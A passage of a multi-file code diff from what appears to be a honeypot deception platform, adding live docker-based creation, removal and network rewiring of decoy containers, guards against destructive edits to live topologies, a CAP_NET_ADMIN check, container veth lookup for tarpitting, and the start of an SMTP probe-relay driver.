"""Return the topology row only when it's eligible for live materialisation.
Returns None (so callers can skip with a single ``if`` check) when:
* the topology doesn't exist;
* status is not ``active`` or ``degraded`` (pending topologies get
everything materialised at deploy time);
* the topology is pinned to a swarm agent (cross-host live editing
is its own routing workstream).
"""
topology = await repo.get_topology(topology_id)
if topology is None:
return None
if topology.status not in ("active", "degraded"):
return None
if topology.target_host_uuid:
_log.info(
"live decky op skipped (agent-pinned topology=%s); "
"next agent push will reconcile",
topology_id,
)
return None
return topology
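The three eligibility rules listed in the docstring above reduce to a short predicate. The sketch below assumes a topology object with `status` and `target_host_uuid` attributes, as the function body suggests; the `Topology` dataclass and the `eligible_for_live_ops` name are hypothetical.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class Topology:
    status: str
    target_host_uuid: Optional[str] = None


def eligible_for_live_ops(topology: Optional[Topology]) -> bool:
    """Mirror the three skip conditions as a single boolean."""
    if topology is None:
        return False  # topology does not exist
    if topology.status not in ("active", "degraded"):
        return False  # pending topologies materialise at deploy time
    if topology.target_host_uuid:
        return False  # pinned to an agent, reconciled on next push
    return True
```

Returning the row or `None` from the real helper, rather than a boolean, lets each caller guard with a single `if` and still use the row afterwards.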
async def _rerender_compose(repo: Any, topology_id: str) -> None:
"""Re-render the per-topology compose file from the current DB.
Called after each materialisation step so the file on disk matches
the topology rows. Soft-fails: a render error is logged but
doesn't poison the DB-side mutation.
"""
from decnet.engine.deployer import _topology_compose_path
from decnet.topology.compose import write_topology_compose
hydrated = await hydrate(repo, topology_id)
if hydrated is None:
return
try:
write_topology_compose(hydrated, _topology_compose_path(topology_id))
except Exception as exc: # noqa: BLE001
_log.warning(
"live op: compose re-render failed topology=%s: %s",
topology_id, exc,
)
async def _materialise_decky_spawn(
repo: Any, topology_id: str, decky_name: str, services: list[str],
) -> bool:
"""compose up -d --no-deps --build for one decky (base + services).
Re-renders compose first so the file lists the new decky. Returns
True when compose-up reported success, False otherwise (or when
the topology isn't eligible for live materialisation — pending
topologies skip and return False so the caller doesn't flip the
state to ``running`` based on a no-op). Best-effort: docker
failure is logged, not re-raised — DB row is the source of truth.
"""
if await _live_topology_or_none(repo, topology_id) is None:
return False
from decnet.engine.deployer import _topology_compose_path
await _rerender_compose(repo, topology_id)
targets = _decky_targets(decky_name, services)
compose_path = _topology_compose_path(topology_id)
try:
await _compose_up_with_buildkit_fallback(
"up", "-d", "--no-deps", "--build", *targets,
compose_file=compose_path,
label=f"live add_decky topology={topology_id} decky={decky_name}",
)
return True
except Exception as exc: # noqa: BLE001
_log.error(
"live add_decky: compose up failed topology=%s decky=%s: %s",
topology_id, decky_name, exc,
)
return False
async def _materialise_decky_remove(
repo: Any, topology_id: str, decky_name: str, services: list[str],
) -> None:
"""compose stop + rm -f for one decky's containers, then re-render."""
if await _live_topology_or_none(repo, topology_id) is None:
return
import anyio
from decnet.engine.deployer import _compose, _topology_compose_path
targets = _decky_targets(decky_name, services)
compose_path = _topology_compose_path(topology_id)
# Stop + rm BEFORE re-rendering compose; the re-rendered file no
# longer mentions the decky, so a stop run AFTER rendering would
# find no service to act on.
try:
await anyio.to_thread.run_sync(
lambda: _compose("stop", *targets, compose_file=compose_path),
)
except Exception as exc: # noqa: BLE001
_log.warning(
"live remove_decky: compose stop failed topology=%s decky=%s: %s",
topology_id, decky_name, exc,
)
try:
await anyio.to_thread.run_sync(
lambda: _compose("rm", "-f", *targets, compose_file=compose_path),
)
except Exception as exc: # noqa: BLE001
_log.warning(
"live remove_decky: compose rm failed topology=%s decky=%s: %s",
topology_id, decky_name, exc,
)
await _rerender_compose(repo, topology_id)
async def _materialise_decky_connect(
repo: Any, topology_id: str,
decky_name: str, lan_name: str, ipv4_address: str,
) -> None:
"""SDK ``network.connect`` to multi-home a running base container.
Service containers share the base's netns via ``network_mode:
service:<base>`` (see :mod:`decnet.topology.compose`), so attaching
the base alone gives every service container the new interface for
free — we don't need to iterate.
"""
if await _live_topology_or_none(repo, topology_id) is None:
return
import docker
from decnet.topology.compose import _container_name, _network_name
net_name = _network_name(topology_id, lan_name)
container_name = _container_name(topology_id, decky_name)
try:
client = docker.from_env()
net = client.networks.get(net_name)
container = client.containers.get(container_name)
net.connect(container, ipv4_address=ipv4_address)
except docker.errors.APIError as exc:
# Idempotency — already on the network is fine.
msg = str(exc).lower()
if "already" in msg or ("endpoint" in msg and "exists" in msg):
_log.info(
"live attach_decky: %s already on network %s — skipping",
container_name, net_name,
)
else:
_log.error(
"live attach_decky: connect failed topology=%s decky=%s lan=%s: %s",
topology_id, decky_name, lan_name, exc,
)
except Exception as exc: # noqa: BLE001
_log.error(
"live attach_decky: SDK call crashed topology=%s decky=%s lan=%s: %s",
topology_id, decky_name, lan_name, exc,
)
await _rerender_compose(repo, topology_id)
async def _materialise_decky_disconnect(
repo: Any, topology_id: str, decky_name: str, lan_name: str,
) -> None:
"""SDK ``network.disconnect`` to drop a multi-home edge."""
if await _live_topology_or_none(repo, topology_id) is None:
return
import docker
from decnet.topology.compose import _container_name, _network_name
net_name = _network_name(topology_id, lan_name)
container_name = _container_name(topology_id, decky_name)
try:
client = docker.from_env()
net = client.networks.get(net_name)
container = client.containers.get(container_name)
net.disconnect(container)
except docker.errors.APIError as exc:
msg = str(exc).lower()
if "not connected" in msg or "no such" in msg:
_log.info(
"live detach_decky: %s already off network %s — skipping",
container_name, net_name,
)
else:
_log.error(
"live detach_decky: disconnect failed topology=%s decky=%s lan=%s: %s",
topology_id, decky_name, lan_name, exc,
)
except Exception as exc: # noqa: BLE001
_log.error(
"live detach_decky: SDK call crashed topology=%s decky=%s lan=%s: %s",
topology_id, decky_name, lan_name, exc,
)
await _rerender_compose(repo, topology_id)
async def _materialise_decky_services_diff(
repo: Any, topology_id: str,
decky_name: str,
added: list[str],
removed: list[str],
) -> None:
"""Add/remove per-service containers without touching siblings.
Mirrors :mod:`decnet.engine.services_live`'s up/down pattern but
without coupling the mutator to that module — service mutations
routed via the mutator queue publish ``mutation.applied`` while the
direct API publishes ``decky.<name>.service_added``; they share
machinery, not control flow.
"""
if not added and not removed:
return
if await _live_topology_or_none(repo, topology_id) is None:
return
import anyio
from decnet.engine.deployer import _compose, _topology_compose_path
await _rerender_compose(repo, topology_id)
compose_path = _topology_compose_path(topology_id)
add_targets = _decky_targets(decky_name, list(added))[1:] # drop the base
if add_targets:
try:
await _compose_up_with_buildkit_fallback(
"up", "-d", "--no-deps", "--build", *add_targets,
compose_file=compose_path,
label=f"live update_decky add topology={topology_id} decky={decky_name}",
)
except Exception as exc: # noqa: BLE001
_log.error(
"live update_decky add: compose up failed topology=%s decky=%s: %s",
topology_id, decky_name, exc,
)
rm_targets = _decky_targets(decky_name, list(removed))[1:]
for action_name, args in (("stop", ("stop",)), ("rm", ("rm", "-f"))):
if not rm_targets:
break
try:
await anyio.to_thread.run_sync(
lambda args=args: _compose(*args, *rm_targets, compose_file=compose_path), # type: ignore[misc]
)
except Exception as exc: # noqa: BLE001
_log.warning(
"live update_decky %s failed topology=%s decky=%s: %s",
action_name, topology_id, decky_name, exc,
)
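`_materialise_decky_services_diff` receives `added` and `removed` lists, but the excerpt does not show how the caller computes them. One plausible way, offered purely as an assumption, is an order-preserving difference between the old and new service lists; `diff_services` is a hypothetical helper.

```python
def diff_services(old: list[str], new: list[str]) -> tuple[list[str], list[str]]:
    """Return (added, removed), preserving each list's original order."""
    old_set, new_set = set(old), set(new)
    added = [svc for svc in new if svc not in old_set]
    removed = [svc for svc in old if svc not in new_set]
    return added, removed
```

With `old = ["ssh", "http"]` and `new = ["http", "smtp"]`, only `smtp` would be brought up and only `ssh` stopped and removed, leaving the unchanged `http` container alone.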
async def _materialise_decky_recreate_base(
repo: Any, topology_id: str, decky_name: str,
) -> None:
"""Force-recreate just the base container (used for forwards_l3 flips).
DESTRUCTIVE: kills any in-container state on the base. Service
containers re-attach via ``network_mode: service:<base>`` after the
base is rebuilt. Caller is responsible for gating this on an
explicit operator-supplied ``force=true`` flag.
"""
if await _live_topology_or_none(repo, topology_id) is None:
return
import anyio
from decnet.engine.deployer import (
_compose_with_retry, _topology_compose_path,
)
await _rerender_compose(repo, topology_id)
compose_path = _topology_compose_path(topology_id)
try:
await anyio.to_thread.run_sync(
lambda: _compose_with_retry(
"up", "-d", "--no-deps", "--force-recreate", decky_name,
compose_file=compose_path,
),
)
except Exception as exc: # noqa: BLE001
_log.error(
"live update_decky recreate_base failed topology=%s decky=%s: %s",
topology_id, decky_name, exc,
)
# ------------------------------------------------------------------- ops
@@ -131,6 +588,16 @@ async def apply_add_lan(
 "y": payload.get("y"),
 }
 )
+# Live materialisation: when the topology is active/degraded, create
+# the docker bridge network now and re-render the per-topology
+# compose file so subsequent ``apply_add_decky`` writes a coherent
+# services map. Pending topologies skip this — the next deploy
+# creates everything from scratch. Agent-pinned topologies also
+# skip; live editing on agents is its own routing problem.
+await _materialise_lan_change(
+repo, topology_id, created=(name, subnet, is_dmz),
+)
 await _assert_valid_after(repo, topology_id)
@@ -150,7 +617,17 @@ async def apply_remove_lan(
 f"LAN {lan['name']!r} is the home LAN of decky "
 f"{d['decky_config']['name']!r}; remove the decky first"
 )
-await repo.delete_lan(lan["id"])
+lan_name = lan["name"]
+# enforce_pending=False: the mutator queue is the live-editing
+# surface, gated on topology status by us before we got here. The
+# repo's pending-only guard is for HTTP CRUD callers that mustn't
+# bypass it.
+await repo.delete_lan(lan["id"], enforce_pending=False)
+# Live materialisation symmetric to apply_add_lan: tear down the
+# docker bridge and re-render compose so a future redeploy doesn't
+# try to wire deckies into a network that no longer exists.
+await _materialise_lan_change(repo, topology_id, removed=lan_name)
 await _assert_valid_after(repo, topology_id)
@@ -204,11 +681,12 @@ async def apply_add_decky(
 if forwards_l3:
 decky_config["forwards_l3"] = True
+services_list = list(payload.get("services", []))
 decky_uuid = await repo.add_topology_decky(
 {
 "topology_id": topology_id,
 "name": name,
-"services": list(payload.get("services", [])),
+"services": services_list,
 "decky_config": decky_config,
 "x": payload.get("x"),
 "y": payload.get("y"),
@@ -223,6 +701,25 @@ async def apply_add_decky(
 "forwards_l3": forwards_l3,
 }
 )
+# Live materialisation: spawn the new decky's containers without
+# touching siblings. Skips on pending / agent-pinned topologies —
+# see _live_topology_or_none.
+spawned = await _materialise_decky_spawn(
+repo, topology_id, name, services_list,
+)
+# Flip the row's state to 'running' on success so the dashboard's
+# ACTIVE DECKIES count reflects reality. Without this the row
+# stays at the default 'pending' forever; the deployer's full
+# post-deploy reconcile only runs on a fresh deploy_topology.
+if spawned:
+try:
+await repo.update_topology_decky(decky_uuid, {"state": "running"})
+except Exception as exc: # noqa: BLE001
+_log.warning(
+"live add_decky: state flip to running failed "
+"topology=%s decky=%s: %s",
+topology_id, name, exc,
+)
 await _assert_valid_after(repo, topology_id)
@@ -286,6 +783,16 @@ async def apply_attach_decky(
 "forwards_l3": forwards_l3,
 }
 )
+# Live materialisation: SDK network.connect on the base container.
+# Service containers share the base's netns via network_mode:
+# service:<base>, so they inherit the new interface — only the base
+# needs the connect.
+await _materialise_decky_connect(
+repo, topology_id,
+decky_name=decky["decky_config"]["name"],
+lan_name=lan["name"],
+ipv4_address=ip,
+)
 await _assert_valid_after(repo, topology_id)
@@ -329,7 +836,15 @@ async def apply_detach_decky(
 await repo.update_topology_decky(
 decky["uuid"], {"decky_config": new_cfg}
 )
-await repo.delete_topology_edge(edge["id"])
+await repo.delete_topology_edge(edge["id"], enforce_pending=False)
+# Live materialisation: SDK network.disconnect on the base
+# container. Service containers automatically lose visibility into
+# the LAN because they share the base's netns.
+await _materialise_decky_disconnect(
+repo, topology_id,
+decky_name=decky["decky_config"]["name"],
+lan_name=lan["name"],
+)
 await _assert_valid_after(repo, topology_id)
@@ -340,7 +855,15 @@ async def apply_remove_decky(
 decky = _decky_by_name(hydrated, payload["decky"])
 if decky is None:
 raise MutationError(f"decky {payload['decky']!r} not found")
-await repo.delete_topology_decky(decky["uuid"])
+decky_name = decky["decky_config"]["name"]
+services_list = list(decky.get("services") or [])
+await repo.delete_topology_decky(decky["uuid"], enforce_pending=False)
+# Live materialisation: stop + rm -f the decky's containers. We
+# capture decky_name + services BEFORE the delete so the helper
+# has the targets even though the row is gone.
+await _materialise_decky_remove(
+repo, topology_id, decky_name, services_list,
+)
 await _assert_valid_after(repo, topology_id)
@@ -354,31 +877,136 @@ async def apply_update_decky(
``patch`` — dict merged into existing ``decky_config``. ``patch`` — dict merged into existing ``decky_config``.
``services`` — replacement top-level services list. ``services`` — replacement top-level services list.
``x``,``y`` — layout coords. ``x``,``y`` — layout coords.
``force`` — opt-in for destructive recreates (currently
required when ``forwards_l3`` flips on a
live topology — see below).
Live materialisation strategy:
* **services changed** → diff old vs new; ``compose up -d`` for
added, ``compose stop`` + ``rm -f`` for removed. Mirrors the
direct API path (services_live) without coupling.
* **forwards_l3 flipped** → port publishing changes, which docker
can only apply at container-create time. Requires recreating
the base — destructive (kills in-container state, drops active
sessions). Gated on ``payload['force'] is True``; otherwise we
raise ``MutationError`` so a half-thinking operator doesn't
stomp a live decky.
* **only coords (x/y)** → DB-only. No docker work.
""" """
hydrated = await _hydrated(repo, topology_id) hydrated = await _hydrated(repo, topology_id)
decky = _decky_by_name(hydrated, payload["decky"]) decky = _decky_by_name(hydrated, payload["decky"])
if decky is None: if decky is None:
raise MutationError(f"decky {payload['decky']!r} not found") raise MutationError(f"decky {payload['decky']!r} not found")
# Capture pre-state so we can compute the diff after the DB write.
old_services = list(decky.get("services") or [])
old_cfg = decky.get("decky_config") or {}
old_forwards_l3 = bool(old_cfg.get("forwards_l3", False))
patch: dict[str, Any] = {} patch: dict[str, Any] = {}
new_decky_config = old_cfg
if payload.get("patch"): if payload.get("patch"):
merged = dict(decky["decky_config"]) new_decky_config = {**old_cfg, **payload["patch"]}
merged.update(payload["patch"]) patch["decky_config"] = new_decky_config
patch["decky_config"] = merged new_services = old_services
if "services" in payload: if "services" in payload:
patch["services"] = list(payload["services"]) new_services = list(payload["services"])
patch["services"] = new_services
for key in ("x", "y"): for key in ("x", "y"):
if key in payload: if key in payload:
patch[key] = payload[key] patch[key] = payload[key]
if not patch: if not patch:
return return
new_forwards_l3 = bool(new_decky_config.get("forwards_l3", False))
forwards_l3_flipped = new_forwards_l3 != old_forwards_l3
# Promotion path: refuse to flip a non-DMZ decky to gateway. The
# 'gateway' semantic specifically means 'host-port publisher facing
# the DMZ' — running it on an internal LAN publishes ports the
# outside world can't reach and shadows the host's port space.
# Generic L3-bridge forwards_l3 (internal multi-homing) is set by
# the generator/attach paths, not by this op, so this check only
# fires when the operator explicitly toggles the flag.
if forwards_l3_flipped and new_forwards_l3:
# Re-derive the home LAN from the edges; same logic as
# check_gateway_homed_in_dmz.
decky_uuid = decky["uuid"]
home_lan_id: Optional[str] = None
for e in hydrated["edges"]:
if e["decky_uuid"] == decky_uuid and e.get("is_bridge") is False:
home_lan_id = e["lan_id"]
break
if home_lan_id is None:
for e in hydrated["edges"]:
if e["decky_uuid"] == decky_uuid:
home_lan_id = e["lan_id"]
break
home_lan = next(
(lan for lan in hydrated["lans"] if lan["id"] == home_lan_id),
None,
)
if home_lan is None or not home_lan.get("is_dmz"):
home_name = home_lan["name"] if home_lan else "(unknown)"
raise MutationError(
f"cannot promote decky {decky['decky_config']['name']!r} "
f"to gateway: home LAN {home_name!r} is not a DMZ. "
"Move the decky to the DMZ first, or pick a different decky."
)
# Pre-check the destructive flip BEFORE any DB write, so a refused
# mutation leaves zero side-effects.
is_live = (await _live_topology_or_none(repo, topology_id)) is not None
if is_live and forwards_l3_flipped and not bool(payload.get("force")):
raise MutationError(
f"forwards_l3 flip on live decky "
f"{decky['decky_config']['name']!r} requires force=true; "
"this will recreate the base container and drop in-container state"
)
await repo.update_topology_decky(decky["uuid"], patch) await repo.update_topology_decky(decky["uuid"], patch)
# Materialisation — only when the topology is actually live.
# _live_topology_or_none was already called above; calling the
# individual helpers re-checks (cheap) so they stay self-contained.
decky_name = decky["decky_config"]["name"]
added = sorted(set(new_services) - set(old_services))
removed = sorted(set(old_services) - set(new_services))
if added or removed:
await _materialise_decky_services_diff(
repo, topology_id, decky_name, added, removed,
)
if forwards_l3_flipped:
# force was checked above; reaching here means the operator
# opted in. recreate_base re-renders compose first so the
# rebuilt base picks up the new `ports:` block.
await _materialise_decky_recreate_base(
repo, topology_id, decky_name,
)
await _assert_valid_after(repo, topology_id) await _assert_valid_after(repo, topology_id)
async def apply_update_lan( async def apply_update_lan(
repo: Any, topology_id: str, payload: dict[str, Any] repo: Any, topology_id: str, payload: dict[str, Any]
) -> None: ) -> None:
"""Update LAN fields — subnet, is_dmz, coords, rename.""" """Update LAN fields — subnet, is_dmz, coords, rename.
Guard rail: ``subnet`` and ``is_dmz`` are pinned at deploy time.
Live deckies bind to the bridge with IPs allocated from the old
subnet (and ``is_dmz`` flips swap the bridge's ``internal=False``
flag, which docker can't change on a network with active
containers). Reject those mutations on active/degraded topologies
rather than rewriting the DB into an incoherent state.
Coord-only updates (``x``/``y``) are layout-only; let them through
unconditionally. Renames pass through too. The bridge's docker name
is keyed off ``_network_name(topology_id, lan_name)``, so a rename on
a live topology would strictly need a rebuild, but rename isn't
currently a code path on active topologies. If the operator hits it
we still write the row and let the next deploy reconcile.
"""
hydrated = await _hydrated(repo, topology_id) hydrated = await _hydrated(repo, topology_id)
lan = _lan_by_name(hydrated, payload["name"]) lan = _lan_by_name(hydrated, payload["name"])
if lan is None: if lan is None:
@@ -389,6 +1017,17 @@ async def apply_update_lan(
fields[key] = payload[key] fields[key] = payload[key]
if not fields: if not fields:
return return
topology = await repo.get_topology(topology_id)
is_live = bool(topology) and topology.status in ("active", "degraded")
if is_live:
hostile = {"subnet", "is_dmz"} & fields.keys()
if hostile:
raise MutationError(
f"cannot change {sorted(hostile)} on a deployed LAN; "
f"teardown + redeploy required"
)
await repo.update_lan(lan["id"], fields) await repo.update_lan(lan["id"], fields)
await _assert_valid_after(repo, topology_id) await _assert_valid_after(repo, topology_id)
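Review note: the live-materialisation rules in the ``apply_update_decky`` docstring can be condensed into a pure planning step. The following is a minimal sketch, not the project's code: ``UpdatePlan`` and ``plan_decky_update`` are hypothetical names, ``MutationError`` is a local stand-in, and the function only mirrors the set-difference service diff and the ``force`` gate without touching docker or the DB.

```python
from dataclasses import dataclass, field


class MutationError(Exception):
    """Local stand-in for the project's MutationError (assumed plain exception)."""


@dataclass
class UpdatePlan:
    added: list = field(default_factory=list)      # services to bring up
    removed: list = field(default_factory=list)    # services to stop + rm -f
    recreate_base: bool = False                    # destructive base recreate


def plan_decky_update(old_services, new_services,
                      old_forwards_l3, new_forwards_l3,
                      *, is_live, force=False):
    """Decide what docker work a decky update implies (hypothetical helper)."""
    flipped = bool(new_forwards_l3) != bool(old_forwards_l3)
    # Refuse the destructive flip before anything is written.
    if is_live and flipped and not force:
        raise MutationError("forwards_l3 flip on a live decky requires force=true")
    return UpdatePlan(
        added=sorted(set(new_services) - set(old_services)),
        removed=sorted(set(old_services) - set(new_services)),
        # Only a live topology has a base container to recreate.
        recreate_base=flipped and is_live,
    )
```

Keeping the decision separate from the side effects would make the "refused mutation leaves zero side-effects" property easy to unit-test.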

@@ -151,11 +151,20 @@ def _ensure_network(
options.update(extra_options) options.update(extra_options)
for net in client.networks.list(names=[MACVLAN_NETWORK_NAME]): for net in client.networks.list(names=[MACVLAN_NETWORK_NAME]):
# networks.list() doesn't populate Containers — reload to get the
# full inspect payload (including connected container IDs).
try:
net.reload()
except docker.errors.APIError:
pass
if net.attrs.get("Driver") == driver: if net.attrs.get("Driver") == driver:
# Same driver — but if the IPAM pool drifted (different subnet, # Same driver — but if the IPAM pool drifted (different subnet,
# gateway, or ip-range than this deploy asks for), reusing it # gateway, or ip-range than this deploy asks for), reusing it
# hands out addresses from the old pool and we race the real LAN. # hands out addresses from the old pool and we race the real LAN.
# Compare and rebuild on mismatch. # Compare and rebuild on mismatch — but only when no containers
# are attached. With active endpoints Docker refuses the remove
# with 403; just attach to the existing network instead.
pools = (net.attrs.get("IPAM") or {}).get("Config") or [] pools = (net.attrs.get("IPAM") or {}).get("Config") or []
cur = pools[0] if pools else {} cur = pools[0] if pools else {}
if ( if (
@@ -164,8 +173,15 @@ def _ensure_network(
and cur.get("IPRange") == ip_range and cur.get("IPRange") == ip_range
): ):
return # right driver AND matching pool, leave it alone return # right driver AND matching pool, leave it alone
# Driver mismatch OR IPAM drift — tear it down. Disconnect any live if net.attrs.get("Containers"):
# containers first so `remove()` doesn't refuse with ErrNetworkInUse. # Active endpoints — can't safely rebuild. Attach to the
# existing network; IPAM drift on ip_range only affects
# Docker's auto-assign pool, which DECNET doesn't use
# (IPs are always set explicitly in the compose file).
return
# Driver mismatch OR empty-endpoint IPAM drift — tear it down.
# Disconnect any live containers first so `remove()` doesn't
# refuse with ErrNetworkInUse.
for cid in (net.attrs.get("Containers") or {}): for cid in (net.attrs.get("Containers") or {}):
try: try:
net.disconnect(cid, force=True) net.disconnect(cid, force=True)
@@ -303,11 +319,44 @@ def remove_bridge_network(client: docker.DockerClient, name: str) -> None:
# Host-side macvlan interface (hairpin fix) # Host-side macvlan interface (hairpin fix)
# --------------------------------------------------------------------------- # ---------------------------------------------------------------------------
def _require_root() -> None: # Linux capability bit positions — see capabilities(7).
if os.geteuid() != 0: _CAP_NET_ADMIN = 12
raise PermissionError(
"MACVLAN host-side interface setup requires root. Run with sudo."
) def _has_cap_net_admin() -> bool:
"""True if the current process holds CAP_NET_ADMIN in its effective set.
Reads ``/proc/self/status`` rather than calling ``capget(2)`` so we
don't need a libcap dependency. ``CapEff`` is a 64-bit hex bitmask;
bit 12 is CAP_NET_ADMIN.
"""
try:
with open("/proc/self/status", "r") as fh:
for line in fh:
if line.startswith("CapEff:"):
bits = int(line.split()[1], 16)
return bool(bits & (1 << _CAP_NET_ADMIN))
except OSError:
pass
return False
def _require_net_admin() -> None:
"""Reject early if the process can't run ``ip link add ... macvlan``.
CAP_NET_ADMIN is what the kernel actually checks for netlink RTM_NEWLINK
of a macvlan/ipvlan slave; euid==0 normally implies it (root holds every
cap unless the bounding set was trimmed, e.g. in a container) but is not
necessary. Prefer the cap check so the systemd unit's
``AmbientCapabilities=CAP_NET_ADMIN`` is honoured without forcing the
whole API to run as root.
"""
if os.geteuid() == 0 or _has_cap_net_admin():
return
raise PermissionError(
"MACVLAN host-side interface setup needs CAP_NET_ADMIN. "
"Either run as root or grant the cap (systemd: "
"AmbientCapabilities=CAP_NET_ADMIN)."
)
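Review note: the ``CapEff`` check in ``_has_cap_net_admin`` is easier to test when the parsing is split from the file read. A minimal sketch, assuming a hypothetical helper ``cap_eff_has`` that takes the text of ``/proc/self/status`` as a string; the bit position 12 for CAP_NET_ADMIN is taken from the diff above.

```python
CAP_NET_ADMIN = 12  # bit position, see capabilities(7)


def cap_eff_has(status_text: str, cap_bit: int) -> bool:
    """Return True if the CapEff line in status_text has cap_bit set."""
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            # The value is a hex bitmask, e.g. "CapEff:\t0000000000001000".
            bits = int(line.split()[1], 16)
            return bool(bits & (1 << cap_bit))
    # No CapEff line at all: treat as "capability not held".
    return False


sample = "Name:\tpython3\nCapEff:\t0000000000001000\n"
print(cap_eff_has(sample, CAP_NET_ADMIN))
```

The real function would pass in the contents of ``/proc/self/status``; feeding a literal string keeps the check independent of the privileges of the test runner.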
def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str) -> None: def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str) -> None:
@@ -317,7 +366,9 @@ def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str
host-helper first: the two drivers can share a parent NIC on paper but host-helper first: the two drivers can share a parent NIC on paper but
leaving the opposite helper in place is just cruft after a driver swap. leaving the opposite helper in place is just cruft after a driver swap.
""" """
_require_root() _require_net_admin()
_run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)
_run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False) _run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)
@@ -332,7 +383,7 @@ def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str
def teardown_host_macvlan(decky_ip_range: str) -> None: def teardown_host_macvlan(decky_ip_range: str) -> None:
_require_root() _require_net_admin()
_run(["ip", "route", "del", decky_ip_range, "dev", HOST_MACVLAN_IFACE], check=False) _run(["ip", "route", "del", decky_ip_range, "dev", HOST_MACVLAN_IFACE], check=False)
_run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False) _run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)
@@ -344,7 +395,9 @@ def setup_host_ipvlan(interface: str, host_ipvlan_ip: str, decky_ip_range: str)
host-helper first so a prior macvlan deploy doesn't leave its slave host-helper first so a prior macvlan deploy doesn't leave its slave
dangling on the parent NIC after the driver swap. dangling on the parent NIC after the driver swap.
""" """
_require_root() _require_net_admin()
_run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)
_run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False) _run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)
@@ -358,7 +411,7 @@ def setup_host_ipvlan(interface: str, host_ipvlan_ip: str, decky_ip_range: str)
def teardown_host_ipvlan(decky_ip_range: str) -> None: def teardown_host_ipvlan(decky_ip_range: str) -> None:
_require_root() _require_net_admin()
_run(["ip", "route", "del", decky_ip_range, "dev", HOST_IPVLAN_IFACE], check=False) _run(["ip", "route", "del", decky_ip_range, "dev", HOST_IPVLAN_IFACE], check=False)
_run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False) _run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)
@@ -378,3 +431,47 @@ def ips_to_range(ips: list[str]) -> str:
strict=False, strict=False,
) )
return str(network) return str(network)
# ---------------------------------------------------------------------------
# Container veth resolution (for tc netem tarpit)
# ---------------------------------------------------------------------------
def get_container_pid(container_name: str) -> int:
"""Return the PID of a running container's init process."""
client = docker.from_env()
try:
container = client.containers.get(container_name)
except docker.errors.NotFound as exc:
raise LookupError(f"container {container_name!r} not found") from exc
pid = container.attrs["State"]["Pid"]
if not pid:
raise LookupError(f"container {container_name!r} is not running (PID=0)")
return pid
def get_container_veth(container_name: str) -> str:
"""Return the host veth interface name paired to container_name's eth0.
Reads /sys/class/net/eth0/iflink from inside the container to get the
peer interface index, then matches it against ``ip link show`` on the host.
Requires no nsenter and no elevated privileges beyond what Docker exec grants.
"""
result = _run(
["docker", "exec", container_name, "cat", "/sys/class/net/eth0/iflink"],
check=False,
)
if result.returncode != 0:
raise LookupError(
f"container {container_name!r} not reachable: {result.stderr.strip()}"
)
peer_index = result.stdout.strip()
links = _run(["ip", "link", "show"])
for line in links.stdout.splitlines():
if line.startswith(f"{peer_index}:"):
# Format: "42: veth3a4b5c@if41: <BROADCAST,...>"
iface = line.split(":")[1].strip().split("@")[0]
return iface
raise LookupError(
f"no host veth found for container {container_name!r} (peer ifindex {peer_index})"
)
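Review note: the interface-name extraction in ``get_container_veth`` can be exercised without docker by parsing canned ``ip link show`` output. A minimal sketch, assuming a hypothetical helper ``veth_for_ifindex``; the sample output is illustrative, not captured from a real host.

```python
from typing import Optional


def veth_for_ifindex(ip_link_output: str, peer_index: str) -> Optional[str]:
    """Find the interface whose index equals peer_index in `ip link show` text."""
    for line in ip_link_output.splitlines():
        # Header lines look like "42: veth3a4b5c@if41: <BROADCAST,...>";
        # continuation lines are indented, so they never match.
        if line.startswith(f"{peer_index}:"):
            return line.split(":")[1].strip().split("@")[0]
    return None


SAMPLE = (
    "1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN\n"
    "    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\n"
    "42: veth3a4b5c@if41: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500\n"
    "    link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff\n"
)
print(veth_for_ifindex(SAMPLE, "42"))
```

Matching on ``"{index}:"`` rather than the bare index keeps a peer index of ``4`` from matching the line for interface ``42``.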

@@ -65,7 +65,7 @@ def get_driver_for(action: Action) -> ActivityDriver:
try: try:
from decnet.orchestrator.emailgen.scheduler import EmailAction from decnet.orchestrator.emailgen.scheduler import EmailAction
except ImportError: # pragma: no cover - scheduler always exists except ImportError: # pragma: no cover - scheduler always exists
EmailAction = None # type: ignore[assignment] EmailAction = None # type: ignore[assignment, misc]
if EmailAction is not None and isinstance(action, EmailAction): if EmailAction is not None and isinstance(action, EmailAction):
from decnet.orchestrator.drivers.email import EmailDriver from decnet.orchestrator.drivers.email import EmailDriver
return EmailDriver() return EmailDriver()

@@ -176,7 +176,7 @@ class EmailDriver(ActivityDriver):
"""Convenience accessor for telemetry / logging.""" """Convenience accessor for telemetry / logging."""
return self._llm.model return self._llm.model
async def run(self, action: EmailAction) -> ActivityResult: async def run(self, action: EmailAction) -> ActivityResult: # type: ignore[override]
return await self._run_email(action) return await self._run_email(action)
async def _run_email(self, action: EmailAction) -> ActivityResult: async def _run_email(self, action: EmailAction) -> ActivityResult:

@@ -0,0 +1,80 @@
"""SMTP probe-relay driver.
Forwards the attacker's first probe email via the master's real internet
connection. The smtp_relay decky runs on MACVLAN and has no gateway access;
the master (where this worker runs) does.
Called by the realism worker's smtp probe listener, not the main tick loop.
"""
from __future__ import annotations
import email
import smtplib
from pathlib import Path
from typing import Any
_ARTIFACTS_ROOT_DEFAULT = "/var/lib/decnet/artifacts"
def _ensure_from_header(body: bytes, mail_from: str) -> bytes:
"""Return body with a From: header added if one is absent."""
try:
msg = email.message_from_bytes(body)
except Exception:
return body
if msg["From"]:
return body
